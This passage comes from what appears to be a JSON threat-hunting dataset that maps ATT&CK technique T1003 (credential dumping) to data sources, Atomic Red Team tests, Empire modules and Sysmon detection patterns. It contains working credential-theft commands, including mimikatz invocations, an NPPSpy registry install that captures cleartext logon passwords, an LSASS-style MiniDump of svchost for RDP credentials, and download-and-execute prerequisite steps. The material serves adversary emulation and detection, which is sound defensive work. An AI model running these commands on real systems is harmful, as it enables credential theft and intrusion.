"source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process metadata", + "description": "Data and information that describe a process (Such as environment variables) and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account metadata", + "description": "Data and information that describe a user account and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "user" + }, + { + "data_source": "active directory", + "definition": "Information associated with the Active Directory service or objects (Such as a user, a group, or a workstation) and activity around them.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Azure AD" + ], + "data_component": "active directory object modification", + "description": "An active directory service or object was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "ad object" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Tools-Report.pdf", + "https://www.justice.gov/file/1080281/download", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-principals" + ], + [ + "https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/ad-ds-getting-started" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1003", + "command_list": [ + "hashdump\nmimikatz !lsadump::sam", + "hashdump\nrun hashdump\nrun smart_hashdump\npost/windows/gather/credentials/domain_hashdump", + "logonpasswords\nmimikatz !sekurlsa::logonpasswords\nmimikatz !sekurlsa::msv\nmimikatz !sekurlsa::kerberos\nmimikatz !sekurlsa::wdigest", + "use mimikatz\nwdigest\nmsv\nkerberos\nlogonpasswords", + "PathToAtomicsFolder\\T1003\\bin\\gsecdump.exe -a\n", + "#{gsecdump_exe} -a\n", + "Copy-Item \"$env:Temp\\NPPSPY.dll\" -Destination \"C:\\Windows\\System32\"\n$path = Get-ItemProperty -Path \"HKLM:\\SYSTEM\\CurrentControlSet\\Control\\NetworkProvider\\Order\" -Name PROVIDERORDER\n$UpdatedValue = $Path.PROVIDERORDER + \",NPPSpy\"\nSet-ItemProperty -Path $Path.PSPath -Name \"PROVIDERORDER\" -Value $UpdatedValue\n$rv = New-Item -Path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\NPPSpy -ErrorAction Ignore\n$rv = New-Item -Path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\NPPSpy\\NetworkProvider -ErrorAction Ignore\n$rv = New-ItemProperty -Path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\NPPSpy\\NetworkProvider -Name \"Class\" -Value 2 -ErrorAction Ignore\n$rv = New-ItemProperty -Path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\NPPSpy\\NetworkProvider -Name \"Name\" -Value NPPSpy -ErrorAction Ignore\n$rv = New-ItemProperty -Path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\NPPSpy\\NetworkProvider -Name \"ProviderPath\" -PropertyType ExpandString -Value \"%SystemRoot%\\System32\\NPPSPY.dll\" -ErrorAction Ignore\necho \"[!] Please, logout and log back in. Cleartext password for this account is going to be located in C:\\NPPSpy.txt\"", + "$ps = (Get-NetTCPConnection -LocalPort 3389 -State Established -ErrorAction Ignore)\nif($ps){$id = $ps[0].OwningProcess} else {$id = (Get-Process svchost)[0].Id }\nC:\\Windows\\System32\\rundll32.exe C:\\windows\\System32\\comsvcs.dll, MiniDump $id $env:TEMP\\svchost-exe.dmp full\n", + ".\\totallylegit.exe #{host.process.id} C:\\Users\\Public\\creds.dmp\n", + "ntdsutil.exe", + "HKLM\\SAM|HKLM\\Security\\\\Windows\\\\.+\\\\lsass.exe", + "\\\\Windows\\\\.+\\\\bcryptprimitives.dll|\\\\Windows\\\\.+\\\\bcrypt.dll|\\\\Windows\\\\.+\\\\ncrypt.dll", + "powershell/collection/ChromeDump", + "powershell/collection/FoxDump", + "powershell/collection/ninjacopy", + "powershell/collection/vaults/add_keepass_config_trigger", + "powershell/collection/vaults/find_keepass_config", + "powershell/collection/vaults/get_keepass_config_trigger", + "powershell/collection/vaults/keethief", + "powershell/collection/vaults/remove_keepass_config_trigger", + "powershell/credentials/enum_cred_store", + "powershell/credentials/mimikatz/cache", + "powershell/credentials/mimikatz/command", + "powershell/credentials/mimikatz/dcsync", + "powershell/credentials/mimikatz/dcsync_hashdump", + "powershell/credentials/mimikatz/extract_tickets", + "powershell/credentials/mimikatz/golden_ticket", + "powershell/credentials/mimikatz/logonpasswords", + "powershell/credentials/mimikatz/lsadump", + "powershell/credentials/mimikatz/mimitokens", + "powershell/credentials/mimikatz/sam", + "powershell/credentials/mimikatz/silver_ticket", + "powershell/credentials/mimikatz/trust_keys", + "powershell/credentials/powerdump", + "powershell/credentials/vault_credential", + "powershell/management/downgrade_account", + "powershell/management/wdigest_downgrade", + "powershell/privesc/gpp", + "powershell/privesc/mcafee_sitelist", + "python/collection/linux/hashdump", + "python/collection/linux/mimipenguin", + "python/collection/osx/hashdump", + "python/collection/osx/kerberosdump", + "python/management/multi/kerberos_inject", + "python/situational_awareness/network/dcos/etcd_crawler" + ], + "commands": [ + { + "command": "hashdump\nmimikatz !lsadump::sam", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "hashdump\nrun hashdump\nrun smart_hashdump\npost/windows/gather/credentials/domain_hashdump", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Metasploit" + }, + { + "command": "logonpasswords\nmimikatz !sekurlsa::logonpasswords\nmimikatz !sekurlsa::msv\nmimikatz !sekurlsa::kerberos\nmimikatz !sekurlsa::wdigest", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "use mimikatz\nwdigest\nmsv\nkerberos\nlogonpasswords", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Metasploit" + }, + { + "command": "PathToAtomicsFolder\\T1003\\bin\\gsecdump.exe -a\n", + "source": "atomics/T1003/T1003.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping" + }, + { + "command": "#{gsecdump_exe} -a\n", + "source": "atomics/T1003/T1003.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping" + }, + { + "command": "Copy-Item \"$env:Temp\\NPPSPY.dll\" -Destination \"C:\\Windows\\System32\"\n$path = Get-ItemProperty -Path \"HKLM:\\SYSTEM\\CurrentControlSet\\Control\\NetworkProvider\\Order\" -Name PROVIDERORDER\n$UpdatedValue = $Path.PROVIDERORDER + \",NPPSpy\"\nSet-ItemProperty -Path $Path.PSPath -Name \"PROVIDERORDER\" -Value $UpdatedValue\n$rv = New-Item -Path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\NPPSpy -ErrorAction Ignore\n$rv = New-Item -Path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\NPPSpy\\NetworkProvider -ErrorAction Ignore\n$rv = New-ItemProperty -Path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\NPPSpy\\NetworkProvider -Name \"Class\" -Value 2 -ErrorAction Ignore\n$rv = New-ItemProperty -Path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\NPPSpy\\NetworkProvider -Name \"Name\" -Value NPPSpy -ErrorAction Ignore\n$rv = New-ItemProperty -Path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\NPPSpy\\NetworkProvider -Name \"ProviderPath\" -PropertyType ExpandString -Value \"%SystemRoot%\\System32\\NPPSPY.dll\" -ErrorAction Ignore\necho \"[!] Please, logout and log back in. Cleartext password for this account is going to be located in C:\\NPPSpy.txt\"", + "source": "atomics/T1003/T1003.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping" + }, + { + "command": "$ps = (Get-NetTCPConnection -LocalPort 3389 -State Established -ErrorAction Ignore)\nif($ps){$id = $ps[0].OwningProcess} else {$id = (Get-Process svchost)[0].Id }\nC:\\Windows\\System32\\rundll32.exe C:\\windows\\System32\\comsvcs.dll, MiniDump $id $env:TEMP\\svchost-exe.dmp full\n", + "source": "atomics/T1003/T1003.yaml", + "name": "Atomic Red Team Test - OS Credential Dumping" + }, + { + "command": ".\\totallylegit.exe #{host.process.id} C:\\Users\\Public\\creds.dmp\n", + "source": "data/abilities/credential-access/3c647015-ab0a-496a-8847-6ab173cd2b22.yml", + "name": "Custom GO credential dumper using minidumpwritedump" + }, + { + "command": "ntdsutil.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "HKLM\\SAM|HKLM\\Security\\\\Windows\\\\.+\\\\lsass.exe", + "source": "SysmonHunter - Credential Dumping", + "name": "" + }, + { + "command": "\\\\Windows\\\\.+\\\\bcryptprimitives.dll|\\\\Windows\\\\.+\\\\bcrypt.dll|\\\\Windows\\\\.+\\\\ncrypt.dll", + "source": "SysmonHunter - Credential Dumping", + "name": "" + }, + { + "command": "powershell/collection/ChromeDump", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/collection/FoxDump", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/collection/ninjacopy", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/collection/vaults/add_keepass_config_trigger", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/collection/vaults/find_keepass_config", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/collection/vaults/get_keepass_config_trigger", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/collection/vaults/keethief", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/collection/vaults/remove_keepass_config_trigger", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/credentials/enum_cred_store", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/credentials/mimikatz/cache", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/credentials/mimikatz/command", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/credentials/mimikatz/dcsync", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/credentials/mimikatz/dcsync_hashdump", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/credentials/mimikatz/extract_tickets", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/credentials/mimikatz/golden_ticket", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/credentials/mimikatz/logonpasswords", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/credentials/mimikatz/lsadump", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/credentials/mimikatz/mimitokens", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/credentials/mimikatz/sam", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/credentials/mimikatz/silver_ticket", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/credentials/mimikatz/trust_keys", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/credentials/powerdump", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/credentials/vault_credential", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/management/downgrade_account", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/management/wdigest_downgrade", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/privesc/gpp", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/privesc/mcafee_sitelist", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/collection/linux/hashdump", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/collection/linux/mimipenguin", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/collection/osx/hashdump", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/collection/osx/kerberosdump", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/management/multi/kerberos_inject", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/situational_awareness/network/dcos/etcd_crawler", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Category": "T1003", + "Built-in Windows Command": "", + "Cobalt Strike": "hashdump\nmimikatz !lsadump::sam", + "Metasploit": "hashdump\nrun hashdump\nrun smart_hashdump\npost/windows/gather/credentials/domain_hashdump", + "Description": "Dumps hashes from the SAM Hive file." + }, + { + "Category": "T1003", + "Built-in Windows Command": "", + "Cobalt Strike": "logonpasswords\nmimikatz !sekurlsa::logonpasswords\nmimikatz !sekurlsa::msv\nmimikatz !sekurlsa::kerberos\nmimikatz !sekurlsa::wdigest", + "Metasploit": "use mimikatz\nwdigest\nmsv\nkerberos\nlogonpasswords", + "Description": "This technique injects into the LSASS.exe process and scrapes its memory for plaintext passwords of logged on users. You must do this from a high integrity process. \nThe Mimikatz project has a lot of different capabilities (https://github.com/gentilkiwi/mimikatz/wiki) such as pass-the-hash, pass-the-ticket, creating silver/golden tickets, dumping credentials, and elevating a process." + }, + { + "attack_technique": "T1003", + "display_name": "OS Credential Dumping", + "atomic_tests": [ + { + "name": "Gsecdump", + "auto_generated_guid": "96345bfc-8ae7-4b6a-80b7-223200f24ef9", + "description": "Dump credentials from memory using Gsecdump.\n\nUpon successful execution, you should see domain\\username's followed by two 32 character hashes.\n\nIf you see output that says \"compat: error: failed to create child process\", execution was likely blocked by Anti-Virus. \nYou will receive only error output if you do not run this test from an elevated context (run as administrator)\n\nIf you see a message saying \"The system cannot find the path specified\", try using the get-prereq_commands to download and install Gsecdump first.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "gsecdump_exe": { + "description": "Path to the Gsecdump executable", + "type": "Path", + "default": "PathToAtomicsFolder\\T1003\\bin\\gsecdump.exe" + }, + "gsecdump_bin_hash": { + "description": "File hash of the Gsecdump binary file", + "type": "String", + "default": "94CAE63DCBABB71C5DD43F55FD09CAEFFDCD7628A02A112FB3CBA36698EF72BC" + }, + "gsecdump_url": { + "description": "Path to download Gsecdump binary file", + "type": "Url", + "default": "https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Gsecdump must exist on disk at specified location (#{gsecdump_exe})\n", + "prereq_command": "if (Test-Path #{gsecdump_exe}) {exit 0} else {exit 1}\n", + "get_prereq_command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\n$parentpath = Split-Path \"#{gsecdump_exe}\"; $binpath = \"$parentpath\\gsecdump-v2b5.exe\"\nIEX(IWR \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1\" -UseBasicParsing)\nif(Invoke-WebRequestVerifyHash \"#{gsecdump_url}\" \"$binpath\" #{gsecdump_bin_hash}){\n Move-Item $binpath \"#{gsecdump_exe}\"\n}\n" + } + ], + "executor": { + "command": "#{gsecdump_exe} -a\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Credential Dumping with NPPSpy", + "auto_generated_guid": "9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6", + "description": "Changes ProviderOrder Registry Key Parameter and creates Key for NPPSpy.\nAfter user's logging in cleartext password is saved in C:\\NPPSpy.txt.\nClean up deletes the files and reverses Registry changes.\nNPPSpy Source: https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy", + "supported_platforms": [ + "windows" + ], + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "NPPSpy.dll must be available in local temp directory", + "prereq_command": "if (Test-Path \"$env:Temp\\NPPSPY.dll\") {exit 0} else {exit 1}", + "get_prereq_command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nInvoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll -OutFile \"$env:Temp\\NPPSPY.dll\"" + } + ], + "executor": { + "command": "Copy-Item \"$env:Temp\\NPPSPY.dll\" -Destination \"C:\\Windows\\System32\"\n$path = Get-ItemProperty -Path \"HKLM:\\SYSTEM\\CurrentControlSet\\Control\\NetworkProvider\\Order\" -Name PROVIDERORDER\n$UpdatedValue = $Path.PROVIDERORDER + \",NPPSpy\"\nSet-ItemProperty -Path $Path.PSPath -Name \"PROVIDERORDER\" -Value $UpdatedValue\n$rv = New-Item -Path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\NPPSpy -ErrorAction Ignore\n$rv = New-Item -Path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\NPPSpy\\NetworkProvider -ErrorAction Ignore\n$rv = New-ItemProperty -Path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\NPPSpy\\NetworkProvider -Name \"Class\" -Value 2 -ErrorAction Ignore\n$rv = New-ItemProperty -Path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\NPPSpy\\NetworkProvider -Name \"Name\" -Value NPPSpy -ErrorAction Ignore\n$rv = New-ItemProperty -Path HKLM:\\SYSTEM\\CurrentControlSet\\Services\\NPPSpy\\NetworkProvider -Name \"ProviderPath\" -PropertyType ExpandString -Value \"%SystemRoot%\\System32\\NPPSPY.dll\" -ErrorAction Ignore\necho \"[!] Please, logout and log back in. Cleartext password for this account is going to be located in C:\\NPPSpy.txt\"", + "cleanup_command": "$cleanupPath = Get-ItemProperty -Path \"HKLM:\\SYSTEM\\CurrentControlSet\\Control\\NetworkProvider\\Order\" -Name PROVIDERORDER\n$cleanupUpdatedValue = $cleanupPath.PROVIDERORDER \n$cleanupUpdatedValue = $cleanupUpdatedValue -replace ',NPPSpy',''\nSet-ItemProperty -Path $cleanupPath.PSPath -Name \"PROVIDERORDER\" -Value $cleanupUpdatedValue\nRemove-Item -Path \"HKLM:\\SYSTEM\\CurrentControlSet\\Services\\NPPSpy\" -Recurse -ErrorAction Ignore\nRemove-Item C:\\NPPSpy.txt -ErrorAction Ignore\nRemove-Item C:\\Windows\\System32\\NPPSpy.dll -ErrorAction Ignore", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Dump svchost.exe to gather RDP credentials", + "auto_generated_guid": "d400090a-d8ca-4be0-982e-c70598a23de9", + "description": "The svchost.exe contains the RDP plain-text credentials.\nSource: https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/\n\nUpon successful execution, you should see the following file created $env:TEMP\\svchost-exe.dmp.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$ps = (Get-NetTCPConnection -LocalPort 3389 -State Established -ErrorAction Ignore)\nif($ps){$id = $ps[0].OwningProcess} else {$id = (Get-Process svchost)[0].Id }\nC:\\Windows\\System32\\rundll32.exe C:\\windows\\System32\\comsvcs.dll, MiniDump $id $env:TEMP\\svchost-exe.dmp full\n", + "cleanup_command": "Remove-Item $env:TEMP\\svchost-exe.dmp -ErrorAction Ignore\n", + "name": "powershell", + "elevation_required": true + } + } + ] + }, + { + "id": "3c647015-ab0a-496a-8847-6ab173cd2b22", + "name": "MiniDumpWriteDump (Spooky)", + "description": "Custom GO credential dumper using minidumpwritedump", + "tactic": "credential-access", + "technique": { + "attack_id": "T1003", + "name": "OS Credential Dumping" + }, + "platforms": { + "windows": { + "psh": { + "command": ".\\totallylegit.exe #{host.process.id} C:\\Users\\Public\\creds.dmp\n", + "payloads": [ + "totallylegit.exe" + ], + "cleanup": "if (Test-Path \"C:\\Users\\Public\\creds.dmp\") {\n rm \"C:\\Users\\Public\\creds.dmp\" -Force;\n};\n" + } + } + }, + "requirements": [ + { + "plugins.stockpile.app.requirements.paw_provenance": [ + { + "source": "host.process.id" + } + ] + } + ] + }, + { + "chain_id": "100053", + "os": "windows", + "parent_process": "ntdsutil.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "ntds.dit", + "frequency": "rare", + "mitre_caption": "credential dumping", + "mitre_attack": "T1003", + "itw_sample": "" + }, + { + "name": "Credential Dumping", + "description": null, + "level": "critical", + "phase": "Credential Access", + "query": [ + { + "type": "reg", + "reg": { + "path": { + "pattern": "HKLM\\SAM|HKLM\\Security" + } + }, + "process": { + "image": { + "pattern": "\\\\Windows\\\\.+\\\\lsass.exe", + "flag": "regex", + "op": "not" + } + }, + "op": "and" + }, + { + "type": "file", + "file": { + "path": { + "pattern": "\\\\Windows\\\\.+\\\\bcryptprimitives.dll|\\\\Windows\\\\.+\\\\bcrypt.dll|\\\\Windows\\\\.+\\\\ncrypt.dll", + "flag": "regex" + } + } + } + ] + }, + { + "Empire Module": "powershell/collection/ChromeDump", + "ATT&CK Technique #1": "T1003", + "ATT&CK Technique #2": "", + "Technique": "Credential Dumping", + "Concatenate for Python Dictionary": "\"powershell/collection/ChromeDump\": [\"T1003\"]," + }, + { + "Empire Module": "powershell/collection/FoxDump", + "ATT&CK Technique #1": "T1003", + "ATT&CK Technique #2": "", + "Technique": "Credential Dumping", + "Concatenate for Python Dictionary": "\"powershell/collection/FoxDump\": [\"T1003\"]," + }, + { + "Empire Module": "powershell/collection/ninjacopy", + "ATT&CK Technique #1": "T1003", + "ATT&CK Technique #2": "", + "Technique": "Credential Dumping", + "Concatenate for Python Dictionary": "\"powershell/collection/ninjacopy\": [\"T1003\"]," + }, + { + "Empire Module": "powershell/collection/vaults/add_keepass_config_trigger", + "ATT&CK Technique #1": "T1003", + "ATT&CK Technique #2": "", + "Technique": "Credential Dumping", + "Concatenate for Python Dictionary": "\"powershell/collection/vaults/add_keepass_config_trigger\": [\"T1003\"]," + }, + { + "Empire Module": "powershell/collection/vaults/find_keepass_config", + "ATT&CK Technique #1": "T1003", + "ATT&CK Technique #2": "", + "Technique": "Credential Dumping", + "Concatenate for Python Dictionary": "\"powershell/collection/vaults/find_keepass_config\": [\"T1003\"]," + }, + { + "Empire Module": "powershell/collection/vaults/get_keepass_config_trigger", + "ATT&CK Technique #1": "T1003", + "ATT&CK Technique #2": "", + "Technique": "Credential Dumping", + "Concatenate for Python Dictionary": "\"powershell/collection/vaults/get_keepass_config_trigger\": [\"T1003\"]," + }, + { + "Empire Module": "powershell/collection/vaults/keethief", + "ATT&CK Technique #1": "T1003", + "ATT&CK Technique #2": "", + "Technique": "Credential Dumping", + "Concatenate for Python Dictionary": "\"powershell/collection/vaults/keethief\": [\"T1003\"]," + }, + { + "Empire Module": "powershell/collection/vaults/remove_keepass_config_trigger", + "ATT&CK Technique #1": "T1003", + "ATT&CK Technique #2": "", + "Technique": "Credential Dumping", + "Concatenate for Python Dictionary": "\"powershell/collection/vaults/remove_keepass_config_trigger\": [\"T1003\"]," + }, + { + "Empire Module": "powershell/credentials/enum_cred_store", + "ATT&CK Technique #1": "T1003", + "ATT&CK Technique #2": "", + "Technique": "Credential Dumping", + "Concatenate for Python Dictionary": "\"powershell/credentials/enum_cred_store\": [\"T1003\"]," + }, + { + "Empire Module": "powershell/credentials/mimikatz/cache", + "ATT&CK Technique #1": "T1003", + "ATT&CK Technique #2": "", + "Technique": "Credential Dumping", + "Concatenate for Python Dictionary": "\"powershell/credentials/mimikatz/cache\": [\"T1003\"]," + }, + { + "Empire Module": "powershell/credentials/mimikatz/command", + "ATT&CK Technique #1": "T1003", + "ATT&CK Technique #2": "", + "Technique": "Credential Dumping", + "Concatenate for Python Dictionary": "\"powershell/credentials/mimikatz/command\": [\"T1003\"]," + }, + { + "Empire Module": "powershell/credentials/mimikatz/dcsync", + "ATT&CK Technique #1": "T1003", + "ATT&CK Technique #2": "", + "Technique": "Credential Dumping", + "Concatenate for Python Dictionary": "\"powershell/credentials/mimikatz/dcsync\": [\"T1003\"]," + }, + { + "Empire Module": "powershell/credentials/mimikatz/dcsync_hashdump", + "ATT&CK Technique #1": "T1003", + "ATT&CK Technique #2": "", + "Technique": "Credential Dumping", + "Concatenate for Python Dictionary": "\"powershell/credentials/mimikatz/dcsync_hashdump\": [\"T1003\"]," + }, + { + "Empire Module": "powershell/credentials/mimikatz/extract_tickets", + "ATT&CK Technique #1": "T1003", + "ATT&CK Technique #2": "", + "Technique": "Credential Dumping", + "Concatenate for Python Dictionary": "\"powershell/credentials/mimikatz/extract_tickets\": [\"T1003\"]," + }, + { + "Empire Module": "powershell/credentials/mimikatz/golden_ticket", + "ATT&CK Technique #1": "T1003", + "ATT&CK Technique #2": "T1097", + "Technique": "Credential Dumping", + "Concatenate for Python Dictionary": "\"powershell/credentials/mimikatz/golden_ticket\": [\"T1003\",\"T1097\"]," + }, + { + "Empire Module": "powershell/credentials/mimikatz/logonpasswords", + "ATT&CK Technique #1": "T1003", + 